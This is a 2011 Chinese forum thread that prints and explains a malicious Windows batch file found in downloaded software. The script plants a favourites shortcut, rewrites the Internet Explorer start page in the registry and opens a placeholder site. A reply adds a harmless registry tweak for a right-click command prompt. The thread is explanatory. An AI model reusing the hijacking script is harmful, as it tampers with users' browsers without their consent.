机器学习和生物信息学实验室联盟

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
查看: 2708|回复: 1
打印 上一主题 下一主题

一个恶意的批处理文件

[复制链接]
跳转到指定楼层
楼主
发表于 2011-7-1 20:05:28 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  1. echo [InternetShortcut] > "%USERPROFILE%\Favorites\TXT小说下载.url"
  2. echo URL=http://www.abcd.com/?Favorites >> "%USERPROFILE%\Favorites\TXT小说下载.url"
  3. echo IDList= >>"%USERPROFILE%\Favorites\TXT小说下载.url"
  4. echo [{000214A0-0000-0000-C000-000000000046}] >> "%USERPROFILE%\Favorites\TXT小说下载.url"
  5. echo  Prop3=19,2 >> "%USERPROFILE%\Favorites\TXT小说下载.url"

  6. @echo
  7. reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.abcd.com" /f
  8. @start iexplore.exe http://www.abcd.com
复制代码

下载软件中经常会发现一些恶意的bat文件,它们基本功能就是篡改浏览器首页。如上所示前一部分在用户目录下收藏中加入了恶意网页快键方式,也就是你打开IE会出现恶意收藏。

第二部分篡改了注册表中的IE首页,最后开启ie,指向www.abcd.com
语法很简单,>>和>类似管道用法,只不过前者是追加,后者是覆盖写。
reg add命令/v 是值value /d是data数值 /f是force强制不打提示。

分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 转播转播 分享分享
回复

使用道具 举报

沙发
发表于 2011-7-1 21:19:07 | 只看该作者
注册表确实容易改

新建个文本文档,起名叫“1.reg”,里面粘贴

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\cmd]
@="DOS Here"

[HKEY_CLASSES_ROOT\*\shell\cmd\command]
@="cmd.exe"

保存,双击运行,就可以改注册表,使右键菜单多出到当前目录dos的选项
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

机器学习和生物信息学实验室联盟  

GMT+8, 2024-11-23 09:51 , Processed in 0.073649 second(s), 18 queries .

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表